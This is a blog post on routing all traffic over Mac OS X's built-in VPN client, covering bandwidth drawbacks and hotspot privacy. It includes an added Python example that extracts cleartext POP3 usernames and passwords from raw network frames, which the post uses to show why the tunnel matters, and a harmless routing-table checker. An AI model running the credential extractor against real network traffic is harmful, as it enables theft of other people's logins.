Why Should a Remote User Route All Traffic Over a VPN?

This post is a follow-up to the article posted last week detailing how to set up OS X’s built-in VPN server.

One of the cool new features in 10.4’s VPN client is the ability to send all traffic over the VPN.  As one reader noted, this is great for people using public access, like a wireless network at the upcoming MacWorld Expo.

Setting the VPN client to send all traffic over the VPN has several advantages, and two possible disadvantages.  First, the down side.

Disadvantages:
Consider the bandwidth available to your VPN server.  If you are on a corporate network, odds are you have a symmetric internet connection, meaning that the connection’s upstream bandwidth is equal to its downstream.  This is the case with the T1 at my office.  If your VPN server is using a consumer-level broadband provider, odds are your connection is asymmetric.  This is often the case with DSL or cable modem connections.  The downstream might be as high as 8 Mb/s, while the upstream is limited to 384 kb/s.  That is the case with my cable modem at home.

The problem occurs when you route all of your traffic through an asymmetric connection.  If the downstream is 8 Mb/s and the upstream is 384 kb/s and I am running my VPN server from that network, the fastest my VPN client will be able to either send or receive data is about 384 kb/s.  Everything the client downloads has to leave the server’s network over that 384 kb/s upstream to reach the client, and everything the client uploads has to leave the same network over the same upstream on its way to the internet, so both directions are funneled through the slow side of the link.  Even if your client’s access point offers higher-speed access, this bottleneck will keep you from surfing at the speeds you might expect.  Also keep in mind that several VPN users in this situation share that one upstream link and can use up the available bandwidth much more quickly than you expect.

Advantages:
As for the advantages, there are many worth considering.  For example, say you are accessing a wireless hotspot from the MacWorld show floor.  If you understand how wireless networks function, you realize that everyone on that same wireless network has the ability to sniff your data unless it’s encrypted.  That means that your mail server’s POP3 login information is sent in the clear for anyone to literally grab out of thin air.  So are the contents of your email messages, for that matter.  The same goes for your FTP login, or any telnet session.
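To make the "grab it out of thin air" point concrete, here is the parsing a sniffer on that hotspot would do.  This is an added example, not code from the original post: it decodes raw Ethernet/IPv4/TCP frames, picks out client-to-server traffic on the POP3 port, and collects the USER/PASS pairs sent in the clear.  The frames are constructed inline (with dummy addresses and zeroed checksums) so the script runs offline; port 110 and the sample addresses and credentials are assumptions, not anything from the post.

```python
"""Extract cleartext POP3 logins from raw IPv4/TCP frames (added example)."""
import struct

POP3_PORT = 110  # assumption: the mail server listens on the standard POP3 port


def ip_to_bytes(dotted):
    """'10.0.0.5' -> b'\\x0a\\x00\\x00\\x05'."""
    return bytes(int(octet) for octet in dotted.split("."))


def build_ipv4_tcp(src_ip, dst_ip, src_port, dst_port, payload):
    """Construct a minimal Ethernet/IPv4/TCP frame carrying `payload`.

    Constructed test data: MAC addresses are zero and checksums are left at
    zero, which the parser below ignores (a real sniffer does the same when
    it only wants the payload)."""
    ethernet = b"\x00" * 12 + b"\x08\x00"            # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port,
                      1, 1,                          # seq, ack
                      5 << 4, 0x18,                  # data offset 5 words, flags PSH|ACK
                      65535, 0, 0)                   # window, checksum, urgent pointer
    total_len = 20 + len(tcp) + len(payload)
    ipv4 = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 6, 0,
                       ip_to_bytes(src_ip), ip_to_bytes(dst_ip))
    return ethernet + ipv4 + tcp + payload


def parse_frame(frame):
    """Return (src_ip, dst_ip, src_port, dst_port, payload), or None if the
    frame is not IPv4 over Ethernet carrying TCP."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ipv4 = frame[14:]
    ihl = (ipv4[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ipv4[2:4])[0]
    if ipv4[9] != 6 or len(ipv4) < total_len:        # protocol 6 = TCP
        return None
    ipv4 = ipv4[:total_len]                           # drop any Ethernet padding
    src_ip = ".".join(str(b) for b in ipv4[12:16])
    dst_ip = ".".join(str(b) for b in ipv4[16:20])
    tcp = ipv4[ihl:]
    if len(tcp) < 20:
        return None
    src_port, dst_port = struct.unpack("!HH", tcp[:4])
    data_offset = (tcp[12] >> 4) * 4
    return src_ip, dst_ip, src_port, dst_port, tcp[data_offset:]


def extract_pop3_credentials(frames):
    """Follow each client->server POP3 flow and collect its USER/PASS pair.

    Returns a list of (client_ip, server_ip, username, password)."""
    flows = {}    # (client_ip, server_ip, client_port) -> {"USER": ..., "PASS": ...}
    creds = []
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src_ip, dst_ip, src_port, dst_port, payload = parsed
        if dst_port != POP3_PORT:
            continue
        state = flows.setdefault((src_ip, dst_ip, src_port), {})
        for line in payload.decode("ascii", "replace").split("\r\n"):
            command, _, argument = line.partition(" ")
            if command.upper() in ("USER", "PASS"):
                state[command.upper()] = argument
        if "USER" in state and "PASS" in state:
            creds.append((src_ip, dst_ip, state["USER"], state["PASS"]))
            flows.pop((src_ip, dst_ip, src_port))
    return creds


# Constructed capture: a POP3 login plus one unrelated HTTP frame that is ignored.
SAMPLE_FRAMES = [
    build_ipv4_tcp("10.0.0.5", "192.0.2.25", 49152, POP3_PORT, b"USER steve\r\n"),
    build_ipv4_tcp("10.0.0.5", "192.0.2.25", 49152, POP3_PORT, b"PASS hunter2\r\n"),
    build_ipv4_tcp("10.0.0.7", "192.0.2.80", 49153, 80, b"GET / HTTP/1.0\r\n\r\n"),
]

if __name__ == "__main__":
    for client, server, user, password in extract_pop3_credentials(SAMPLE_FRAMES):
        print(f"{client} -> {server}: user={user!r} pass={password!r}")
```

With the VPN client set to send all traffic over the tunnel, the frames a sniffer on the hotspot sees are the encrypted tunnel packets to the VPN server, and `parse_frame` never finds a TCP segment to port 110 inside them.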

When you route all traffic through the VPN tunnel, you effectively protect all of that data.  Since the data is passing through the tunnel (both incoming and outgoing), it is unreadable to anyone between you and your VPN server.  Once the traffic reaches the VPN server, it is no longer encrypted and it flows out onto the internet as needed to reach its intended destination.  By then, your data is clear of the danger zone, the shared wireless network.  The VPN connection makes your data as safe as it would be if you were sitting right beside the VPN server, and no safer: a cleartext POP3 login still travels in the clear from the VPN server to your mail server, so the tunnel removes the hotspot from the picture without replacing SSL/TLS on the mail protocols themselves.
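All of this only holds if "send all traffic" really did move your default route onto the tunnel.  The following is an added example, not code from the original post: it parses the kind of table `netstat -rn` prints on Mac OS X and other BSDs and checks two things, that the default route uses the tunnel interface, and that the VPN server itself still has a host route through the physical interface (otherwise the tunnel's own packets would be routed back into the tunnel).  The two routing tables are constructed sample text; the interface names (`ppp0`, `en1`), the addresses, and the assumption that the VPN is a PPP-based tunnel are all mine, not the post's.

```python
"""Check a BSD/macOS `netstat -rn` table for a working full-tunnel VPN (added example)."""


def parse_routes(netstat_text):
    """Return the 'Internet:' section as a list of dicts keyed by column name."""
    routes, header = [], None
    for line in netstat_text.splitlines():
        cols = line.split()
        if not cols:
            continue
        if cols[0] == "Destination":          # header row gives us the column names
            header = cols
            continue
        if cols[0] == "Internet6:":           # stop before the IPv6 section
            break
        if header and len(cols) > header.index("Netif"):
            routes.append(dict(zip(header, cols)))   # Expire is often blank; zip drops it
    return routes


def check_full_tunnel(netstat_text, vpn_if, vpn_server_ip):
    """Return (ok, problems).

    ok is True only when the default route goes out vpn_if AND the VPN server
    has a host route that bypasses the tunnel."""
    routes = parse_routes(netstat_text)
    problems = []

    default = [r for r in routes if r["Destination"] == "default"]
    if not default:
        problems.append("no default route at all")
    elif default[0]["Netif"] != vpn_if:
        problems.append(f"default route uses {default[0]['Netif']}, not {vpn_if}: "
                        "traffic is NOT being sent over the VPN")

    server = [r for r in routes if r["Destination"] == vpn_server_ip]
    if not server:
        problems.append(f"no host route for VPN server {vpn_server_ip}")
    elif server[0]["Netif"] == vpn_if:
        problems.append("route to the VPN server points into the tunnel itself")

    return (not problems, problems)


# Constructed sample: default route via the tunnel, VPN server 203.0.113.10
# still reached through the wireless interface en1 via its gateway 10.0.0.1.
FULL_TUNNEL = """Routing tables

Internet:
Destination        Gateway            Flags    Refs      Use  Netif Expire
default            10.8.0.1           UGSc        5        0   ppp0
10.0.0/24          link#5             UCS         2        0    en1
10.0.0.1           0:1:2:3:4:5        UHLW        3       12    en1
10.8.0.1           10.8.0.2           UH          1        0   ppp0
127                127.0.0.1          UCS         0        0    lo0
127.0.0.1          127.0.0.1          UH          1       24    lo0
203.0.113.10       10.0.0.1           UGHS        1        0    en1
"""

# Constructed sample: the tunnel is up, but the default route still goes
# straight out over the hotspot (split tunnel), so POP3/FTP/telnet leak.
SPLIT_TUNNEL = """Routing tables

Internet:
Destination        Gateway            Flags    Refs      Use  Netif Expire
default            10.0.0.1           UGSc        5        0    en1
10.0.0/24          link#5             UCS         2        0    en1
10.0.0.1           0:1:2:3:4:5        UHLW        3       12    en1
10.8.0.1           10.8.0.2           UH          1        0   ppp0
127.0.0.1          127.0.0.1          UH          1       24    lo0
203.0.113.10       10.0.0.1           UGHS        1        0    en1
"""

if __name__ == "__main__":
    for name, table in (("full tunnel", FULL_TUNNEL), ("split tunnel", SPLIT_TUNNEL)):
        ok, problems = check_full_tunnel(table, "ppp0", "203.0.113.10")
        print(name, "OK" if ok else "PROBLEM: " + "; ".join(problems))
```

On a live machine you would feed it the real output (`netstat -rn`) instead of the sample strings; the check is worth running every time you connect from a new hotspot, because a default route left on the wireless interface quietly defeats the whole point of the setting.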


The Mac OS X VPN client application, Internet Connect.app

This is important to consider when you realize that once someone has your email login, they have full control over your email.  And if you plan on blogging from the show floor, this may be the only way to stay truly secure.  If you consider any of your internet-based traffic confidential, this really is the best way to go.


Steve

2 Responses to Why Should a Remote User Route All Traffic Over a VPN?
  1. Anonymous Reply

    Would that work with a T1 line? Remains to be seen.

  2. smanke Reply

    If you’re thinking of connecting to a VPN from the Mac VPN client, you should still be able to route all traffic over the tunnel, if the device serving the tunnel supports it. I have done it over a VPN direct to a Linksys router.
